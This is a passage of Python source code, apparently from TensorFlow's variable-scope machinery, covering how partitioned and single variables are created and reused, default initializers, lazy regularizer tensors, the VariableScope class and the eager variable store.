if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(
var_full_name + "/PartitionedInitializer", skip_on_eager=False):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with them, so there is no traceback.
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape.is_fully_defined():
if "partition_info" in tf_inspect.getargspec(initializer).args:
init_val = functools.partial(initializer,
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
else:
init_val = functools.partial(initializer,
shape.as_list(), dtype=dtype)
variable_dtype = dtype.base_dtype
elif _needs_no_arguments(initializer):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
def make_regularizer_op():
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
return regularizer(v)
if regularizer(v) is not None:
lazy_eval_tensor = _LazyEvalTensor(make_regularizer_op)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES,
lazy_eval_tensor)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
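For illustration only, a minimal sketch of the resulting defaults when going
through the public `tf.compat.v1.get_variable` entry point (an assumption made
for the example, not part of this method's contract):
```python
w = tf.compat.v1.get_variable("w", [2, 2])               # glorot_uniform
n = tf.compat.v1.get_variable("n", [2], dtype=tf.int32)  # zeros
```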
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTE: Do we need to support handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
class _LazyEvalTensor(core.Tensor):
"""A Tensor-like object that only evaluates its thunk when used."""
def __init__(self, thunk):
"""Initializes a _LazyEvalTensor object.
Args:
thunk: A callable. A thunk which computes the value of the tensor.
"""
self._thunk = thunk
self._master_tensor = thunk()
def _as_tensor(self, dtype=None, name=None, as_ref=False):
del name
assert not as_ref
assert dtype in [None, self.dtype]
return self._thunk()
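# The helpers below dynamically attach Tensor-style attributes to
# _LazyEvalTensor: plain properties (device, dtype, name, ...) and shape
# methods are delegated to the master tensor captured at construction time,
# while operator overloads and `eval`/`numpy` go through `_as_tensor()` and
# therefore re-evaluate the thunk on each use.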
def _make_master_property(name):
@property
def prop(self):
return getattr(self._master_tensor, name) # pylint: disable=protected-access
return prop
_master_property_list = ("device", "dtype", "graph", "name", "op", "shape",
"value_index")
for _name in _master_property_list:
setattr(_LazyEvalTensor, _name, _make_master_property(_name))
def _make_master_method(name):
def method(self, *args, **kwargs):
return getattr(self._master_tensor, name)(*args, **kwargs) # pylint: disable=protected-access
return method
_master_method_list = ("get_shape", "__str__", "shape_as_list")
for _name in _master_method_list:
setattr(_LazyEvalTensor, _name, _make_master_method(_name))
def _make_op_method(name):
def method(self, *args, **kwargs):
return getattr(self._as_tensor(), name)(*args, **kwargs) # pylint: disable=protected-access
return method
_op_list = ("__abs__", "__add__", "__and__", "__bool__", "__div__", "__eq__",
"__floordiv__", "__ge__", "__getitem__", "__gt__", "__invert__",
"__iter__", "__le__", "__len__", "__lt__", "__matmul__", "__mod__",
"__mul__", "__ne__", "__neg__", "__nonzero__", "__or__", "__pow__",
"__radd__", "__rand__", "__rdiv__", "__rfloordiv__", "__rmatmul__",
"__rmod__", "__rmul__", "__ror__", "__rpow__", "__rsub__",
"__rtruediv__", "__rxor__", "__sub__", "__truediv__", "__xor__",
"eval", "numpy")
for _name in _op_list:
setattr(_LazyEvalTensor, _name, _make_op_method(_name))
ops.register_tensor_conversion_function(
_LazyEvalTensor,
lambda val, dtype, name, as_ref: val._as_tensor(dtype, name, as_ref) # pylint: disable=protected-access
)
session.register_session_run_conversion_functions(
_LazyEvalTensor,
lambda fetch: ([fetch._master_tensor], lambda fetched_vals: fetched_vals[0]) # pylint: disable=protected-access
)
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
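# Usage sketch: pass `no_regularizer` explicitly to opt a single variable out
# of a default regularizer inherited from the enclosing variable scope, e.g.
#   v = tf.compat.v1.get_variable(
#       "v", [1], regularizer=tf.compat.v1.no_regularizer)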
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
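A minimal usage sketch (assuming the `tf.compat.v1` API):
```python
with tf.compat.v1.variable_scope(
    "layer", initializer=tf.compat.v1.zeros_initializer()):
  scope = tf.compat.v1.get_variable_scope()
  scope.set_dtype(tf.float64)
  # Defaults carried by the scope: zero-initialized, float64.
  v = tf.compat.v1.get_variable("w", [3])
```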
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None, skip_on_eager=False):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None, skip_on_eager=False):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
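"""Returns the default variable store for the current graph, creating and
registering one on first use."""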
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
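"""Context manager that temporarily installs `store` as the default variable
store, restoring the previous store on exit."""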
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
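A minimal sketch (assumes eager execution and `container`, a hypothetical
EagerVariableStore that already holds variables):
```python
snapshot = container.copy()
# Variables read from `snapshot` can be modified without affecting `container`.
```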
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in six.iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
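For instance, a minimal sketch of creating a partitioned variable with
`fixed_size_partitioner` (splitting axis 0 into two shards):
```python
w = tf.get_variable(
    "w", shape=[10, 20],
    partitioner=tf.fixed_size_partitioner(2))
# Accessing `w` as a Tensor concatenates the two shards along axis 0.
```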
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
